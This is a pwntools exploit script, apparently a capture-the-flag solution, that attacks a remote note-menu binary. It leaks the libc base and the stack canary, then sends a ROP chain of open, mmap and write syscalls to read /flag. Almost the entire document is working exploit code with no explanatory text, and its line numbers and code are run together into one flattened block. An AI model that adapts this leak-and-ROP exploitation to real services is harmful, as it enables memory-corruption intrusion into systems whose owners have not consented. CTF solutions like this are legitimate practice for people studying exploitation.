1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93
| from pwn import *
io = remote('win.the.seetf.sg', 2000) context.binary = 'chall' elf = ELF('chall', checksec = False) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
ru = lambda x : io.recvuntil(x, drop = True) sd = lambda x : io.send(x) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8, '\x00')) libc_os = lambda x : libc_base + x
def menu(choice): sla('> ', str(choice))
def add(): menu(1)
def edit(idx, size, content): menu(2) sla('idx = ', str(idx)) sla('size to write = ', str(size)) if size <= 0x100: sd(content)
def show(idx): menu(3) sla('idx = ', str(idx))
add() ru(' is ') libc_base = int(ru('\n'), 16) - (0x7f911c154000 - 0x7f911bec9000) - (0x7fbff9120000 - 0x7fbff911b000) + 0xd000 for i in range(12): add() if i == 9: ru(' is ') vec_addr = int(ru('\n'), 16) edit(10, 0x50, flat([0x00000000004040A0+0x300, 0x30, '/flag\x00'])) edit(3, 0x1770, 'a') show(3) data = ru('1. create note') canary = uu64(data[-8:]) pop_rax = libc_os(0x0000000000045eb0) pop_rdi = libc_os(0x000000000002a3e5) pop_rsi = libc_os(0x00000000000da97d) pop_rdx_r12 = libc_os(0x000000000011f497) pop_rcx = libc_os(0x000000000008c6bb) syscall = libc_os(0x0000000000091396) pop_r8 = 0x000000000040149a pop_r9 = 0x000000000040149d rop_chain = flat([ pop_rax, 2, pop_rdi, vec_addr + 0x10, pop_rsi, 0, syscall, pop_rax, 9, pop_rdi, 0x2333000, pop_rsi, 0x50, pop_rdx_r12, 1, 0, pop_r8, 3, pop_r9, 0, syscall, pop_rax, 1, pop_rdi, 1, pop_rsi, 0x2333000, pop_rdx_r12, 0x50, 0, syscall ]) pld = flat({ 0: '4', 0x18: canary, 0x28: rop_chain }, filler = '\x00') menu(pld) ia()
|